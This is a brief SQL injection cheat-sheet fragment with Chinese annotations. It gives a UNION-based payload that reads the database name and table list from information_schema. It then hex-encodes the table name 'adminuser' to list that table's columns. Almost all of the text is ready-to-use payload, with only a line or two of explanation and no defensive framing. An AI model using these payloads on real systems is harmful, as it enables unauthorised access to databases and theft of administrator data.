SELECT * FROM users WHERE ID='123' union select 1,database(), group_concat(table_name) from information_schema.tables where table_schema=database()
得到数据库名、表名。
得到表中的字段名 将敏感的表进行16进制编码adminuser=0x61646D696E75736572
select group_concat(column_name) from information_schema.columns where table_name=0x61646D696E75736572